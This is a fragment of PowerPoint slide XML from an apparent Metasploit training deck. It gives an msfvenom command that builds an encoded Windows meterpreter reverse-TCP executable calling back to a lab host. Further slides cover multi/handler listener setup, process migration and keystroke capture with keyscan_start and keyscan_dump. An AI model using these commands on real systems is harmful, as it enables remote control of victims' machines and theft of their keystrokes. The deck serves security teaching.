            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5514AF80-B4CA-1D78-878D-34AB3F57BF09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4339057" y="3661575"/>
            <a:ext cx="36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 the Terminal </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13684432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2BD36D-B67F-ABD4-DF03-933A5568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4DFF7A-485F-8CBA-BE20-B6B25980F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69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1D8D929-A3DD-AA3D-E60A-74A77C012E4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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98B36A9-B1A2-1A99-B281-1570F7FC08A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27955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FDB6E83A-522B-FEAD-EBBC-22299730C5C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27955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130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4793CA7-8299-DC9A-F436-EC42183D7B5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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F80CC14D-D0F3-ED2A-B239-ECF28A3F5D6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673F7CC8-8939-614C-DFC5-C0B13C01FBBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3886" y="103479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64D0EB62-5D4F-A8B4-6762-3C5A90B2BEFB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048C7EDA-370A-9001-A916-75D2677AFFAD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B96C605A-2232-BD6E-C782-6ED36746DB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9529C070-D7F0-68FB-A9A8-392EAD44EEF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Metasploit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756FF954-397F-55EB-B121-C648B06AE372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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35571504-1733-CCDB-9226-A5C7D336D20E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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130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34FBFF32-D0B5-B012-F209-93D8FB8C2AA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>3.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Create payload 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DF9B2DA2-2BD9-1D1D-0A23-516C01DCA69C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485185" y="1915698"/>
            <a:ext cx="332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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --list encoders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D6C804-3585-E5FD-1F48-C1822646E2F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3502516" y="2094978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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33B31166-0B4A-A08F-7600-EE736EC98767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5049845" y="1890705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all encoders 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E9C68D5C-98B8-0024-4379-EE46DCB2C52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627201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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --list platforms      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03BFC0-CC00-74E9-10C7-4E76A675F392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460131" y="250609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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F360C8F-D27D-F9BC-D0E8-E372DD254E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973003" y="2329984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all OS </a:t>
            </a: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3AE9EE84-F10E-EF0B-A45A-F4E2552C9214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16841" y="2724150"/>
            <a:ext cx="49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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --list formats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776278-4C9F-CCA5-36B4-0CC3534CB9B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3191793" y="2927552"/>
            <a:ext cx="5366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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCF672C6-FF93-40ED-FCF5-4FE1F6EB78F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986698" y="2726991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all format </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8796EB0-88B1-4B7F-6037-61CF3B4F3FE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627202" y="3184323"/>
            <a:ext cx="859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 err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> -a x86 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>platfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> windows -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> LHOST=10.0.2.4  LPORT=443 -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> -f exe -o /home/kali/Desktop/cystech1.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> 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7207E11-BA75-5679-D0B9-8E37104DF937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4110954" y="3945535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Text Box 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24A40845-54B7-8AF3-DE42-700DD351CD88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5418237" y="3794386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payload </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170156705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5D9A2A-F22F-66DE-6A29-33E289DA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9AC180-C86B-22C2-DF7F-8DC395E40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69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8218609-5BAB-42BA-D01A-CCC641B28DAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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3E5F8B8-5D1B-80BF-A260-130B571AE1E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27955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9815E91-741D-165B-7F2B-0B54431FBD2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27955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131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C66A219-141C-66CE-52FC-DA62C441F4F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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A45F73C0-096F-D49F-F407-EF399FD671F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1CB19E32-7256-A177-0C19-02B9D56EC42C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3886" y="103479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8D942B61-9FDE-4166-7684-85BEC03E4DD4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9CEB6429-2789-C66C-7681-60A6D4CB52E6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3A805EF5-DD20-8291-AF34-9662E920B9A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E16FA5E3-7AC6-B37C-5AC3-F8F280DD3F9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Metasploit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CA566EEC-DD73-CB16-21F2-EE7363A89D26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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B011D11-7BFA-4B83-DF5D-5F5987ABEAA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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131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68E76C86-1221-A264-19D4-A9F6F80B42C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>3.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Create payload 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BE9E0024-BE05-0DC8-5132-9DA2026488BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403654" y="1906674"/>
            <a:ext cx="332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msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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005241-0B2F-B3E0-1F5E-214C5AE32BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1816843" y="209584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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFD627AE-7358-A02D-77C9-7B78C4D7CC5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3344144" y="1876504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tool Metasploit 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264E4BC6-6923-DB0E-AD5A-85DC241C389E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627201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-use exploit/multi/handler       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4AE7D7-2031-3519-76B0-287014D358CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460131" y="250609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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7492B9-7834-4B33-27B8-CF4CBED935DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973003" y="2329984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reverse connection  </a:t>
            </a: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21B8B58E-695D-2213-CB49-E673E30EBD5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16841" y="2724150"/>
            <a:ext cx="49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-set LHOST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60A014-FE5F-C507-B8C1-596707C21E91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2158439" y="2927552"/>
            <a:ext cx="15700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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0D9EFBB-AFC2-0F0A-EB4D-A5CE35839412}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986698" y="2726991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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> address kali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D155E6-2685-3A1E-9312-DFD180E632F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2077090" y="329127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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB5812A-0149-FEEA-B960-E69EA7A4AB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558908" y="3093482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-set LPORT  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7977302-FA76-98F2-57C0-FE0766163EC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3569518" y="3151488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the port </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70007D18-38E5-1C53-9872-EA8A7B4BE97C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558907" y="3470356"/>
            <a:ext cx="512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-set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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9BBB56-5CF6-5F8A-FDE0-38062326E750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5480364" y="363687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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDF8E84B-5959-373D-3419-5B0A7B21447F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6789135" y="3452207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the payload  </a:t>
            </a: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id="{8EDDC83F-62F7-5B1C-DF87-112B74FD1EFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558146" y="3766216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ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  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4E00A6A-4A8D-D934-437C-A4265B638E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178668" y="397240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9" name="Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A86CDB-16D4-0261-273C-6D12D307667B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2637406" y="3740158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the process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68960904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423978-4082-65E3-B378-A0FE01D1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075984-D5B5-AE41-5A47-4FB084DE5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69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6C0272F-32A6-5715-DCC5-26844581B337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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F9466D3-CA78-8009-1257-FA6529FD4FA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27955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300D940-2BDB-2C9D-B7B7-3F7C7F555CE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27955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132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D1175A99-FE39-0E75-CAC2-5B899C254DC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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197AA4C2-740C-CC36-B4A7-4BD76C9C70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AD10BD95-CDF1-EDCC-6C7B-731C245C5115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3886" y="103479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6708B7A9-0AB6-9392-572F-7BBAF58EE118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8DBF68CF-2974-77C1-9AD9-47DB5E0DE588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6ED15EE4-143B-9D21-194A-D7996FC2A5B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F1EA5981-BE5F-CFC6-B2CF-A85811B98F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Metasploit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CEA6F7C1-1AC4-85F4-9D75-B2D6DB0A8454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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3BCC520D-2611-1CD4-DA7B-28E12C4D5CB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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132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0AC27048-FC3F-8057-DDB7-FB8A25796BEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>3.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Create payload 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BED4D67E-2F78-84D0-89EB-4F7CD1998092}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403654" y="1906674"/>
            <a:ext cx="332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-migrate id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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F6B4B9-DE0E-D7C8-F49B-ECFD14144618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="208090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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EBEBA81-3D31-C418-AF81-ED8FC551E51B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3753084" y="1906674"/>
            <a:ext cx="318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 Windows permission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501B9D7C-A572-AA0D-8F28-86E3E525CF46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627201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keyscan_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       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1D86E1-4043-7F07-0F33-125235B7E7FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460131" y="250609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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E0116F8-C0A4-1463-B410-F26D51961D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973003" y="2329984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scan Keyboard</a:t>
            </a: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68C14184-D1E0-4741-00EA-6D5BF5AB7102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16841" y="2724150"/>
            <a:ext cx="49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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>keyscan_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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298425-7569-FD79-4E37-29172B955564}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416668" y="2927552"/>
            <a:ext cx="15700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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B15481D-654E-39A9-9046-68DA8A3E7FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986698" y="2726991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scan Keyboard </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207705029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DAFE82-2122-708E-B3AC-08300297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DAC96D-69CF-6B66-982C-436C24ADE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69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95DFB0F-67AD-7189-F0EE-62EE9A872A35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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ABACD30-0C78-63D8-A8C6-3E9650D50AC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27955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FC6BB75C-BBDC-43BA-EF5F-A6D2274DE56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27955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133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FB89C2A-81CD-0D8A-67AA-361EF449B047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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B671B278-8637-1AB4-EB2C-D50D37D4C5D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EE5F4B78-1B3E-5A1B-1067-364123DE3869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
